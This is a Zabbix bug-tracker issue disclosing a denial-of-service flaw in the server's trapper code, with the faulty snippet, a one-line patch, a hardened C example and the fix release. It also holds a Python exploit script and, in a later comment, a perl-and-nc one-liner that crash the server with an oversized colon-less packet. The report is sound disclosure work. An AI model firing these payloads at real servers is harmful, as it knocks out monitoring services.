Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 1.6
    • Fix Version/s: 1.6
    • Component/s: Proxy (P), Server (S)
    • Labels:
      None
    • Environment:
      Zabbix server v1.6.x

      Description

      While reading Zabbix source code, I found a small error leading to an
      easy to exploit denial of service vulnerability (tested in version 1.6.1
      as shipped on Ubuntu and 1.6.5 compiled from source).

      In src/zabbix_server/trapper/trapper.c, function process_trap() :

      /* Make a truncated to 2047 copy of "s" */
        strscpy(copy,s);
      /* Check if there's some ":" in "s" (and not in "copy" !) */
        server=(char *)strtok(s,":");

      [...]

      /* Look for the 1st ":" in "copy" */
        value_string=strchr(copy,':');
      /* If 1st ":" in "s" is after offset 2047 */
      /* we got a null ptr dereference crash */
        value_string=strchr(value_string+1,':');

      The patch is trivial : just use "copy" instead of "s" in your check.

      server=(char *)strtok(copy,":");

      Exploit code :

      8<-----------------------------------------------------------------
      #!/usr/bin/python

      PORT = 10051
      HOST = "192.168.2.89"

      import socket
      import struct

      try:
          socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          socket.settimeout(3)
          socket.connect((HOST, PORT))

          header = 'ZBXD\x01'

          # DoS in ./src/zabbix_server/trapper/trapper.c
          # If first ":" is after 2047 => DoS when reading NULL+1
          data = 'A'*2050 + ':B'

          size = struct.pack('q', len(data))
          socket.send(header + size + data)
          rcvdata = socket.recv(10240)
          print rcvdata
      except:
          print "FAIL"

      socket.close()
      8<-----------------------------------------------------------------
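
The mismatch described in the report, as an added example (not Zabbix source and not the reporter's code): it models the check-on-"s", lookup-on-"copy" logic without performing the NULL dereference, next to a form that runs every check on the truncated copy and tests each strchr() result. The names copy_trunc, prefix_logic_hits_null and parse_hardened, the 2048-byte buffer size, and the choice to reject input with fewer than two ":" are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define COPY_SIZE 2048 /* assumption: 2047 chars + NUL, matching the report */

/* Hypothetical stand-in for the truncating copy the report calls strscpy(). */
static void copy_trunc(char *dst, const char *src) {
    size_t n = strlen(src);
    if (n > COPY_SIZE - 1) n = COPY_SIZE - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
}

/* Pre-fix decision logic, modelled on the report: the ':' test reads s,
 * the lookup reads copy. Returns 1 when the following strchr() would be
 * handed NULL+1, without ever performing that dereference. */
int prefix_logic_hits_null(const char *s) {
    char copy[COPY_SIZE];
    copy_trunc(copy, s);
    return strchr(s, ':') != NULL && strchr(copy, ':') == NULL;
}

/* Hardened form: every check runs on copy, and each strchr() result is
 * tested before use. Returns 0 and points *value past the second ':',
 * or -1 for input that is malformed after truncation. */
int parse_hardened(const char *s, char copy[COPY_SIZE], const char **value) {
    const char *p;
    copy_trunc(copy, s);
    if ((p = strchr(copy, ':')) == NULL) return -1;
    if ((p = strchr(p + 1, ':')) == NULL) return -1;
    *value = p + 1;
    return 0;
}

int main(void) {
    static char late[4096], copy[COPY_SIZE];
    const char *value = NULL;
    memset(late, 'A', 2050);     /* constructed input: first ':' past the copy */
    strcpy(late + 2050, ":B");
    int rc = parse_hardened(late, copy, &value);
    printf("late colon:  pre-fix hits NULL=%d, hardened rc=%d\n",
           prefix_logic_hits_null(late), rc);
    rc = parse_hardened("host:key:42", copy, &value);
    printf("host:key:42: pre-fix hits NULL=%d, hardened rc=%d, value=%s\n",
           prefix_logic_hits_null("host:key:42"), rc, rc == 0 ? value : "(none)");
    return 0;
}
```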

        Activity

        Alexander Vladishev added a comment -

        Fixed in version pre1.6.6, rev. 7690.

        richlv added a comment -

        closing all resolved issues

        Rafael Gomes added a comment -

        I got this error with exploit:

        File "166.pl", line 18
        data = 'A'*2050 + ':B'
        ^
        SyntaxError: invalid syntax

        My Zabbix server 1.6.4 was compiled from source.

        My version is affected too?

        richlv added a comment -

        as the original comment said, it should be fixed in 1.6.6

        ZBX-993#action_16403

        richlv added a comment -

        let's try full link then... https://support.zabbix.com/browse/ZBX-993#action_16403

        Rafael Gomes added a comment -

        I just wanna know if my version is affected, because I can't exploit with this code.

        Nicob added a comment -

        Indentation of the provided exploit code is broken.

        Version 1.6.4 (even from source) is affected, but you may try the following PoC :
        perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051

        Rafael Gomes added a comment -

        Hi Nicob,

        Thanks for your help, but I can't exploit it yet.

        When I put your code in server, I didn't get anything and my server is still running


          People

          • Assignee:
            Alexander Vladishev
            Reporter:
            Alexander Vladishev
          • Votes:
            0
            Watchers:
            2
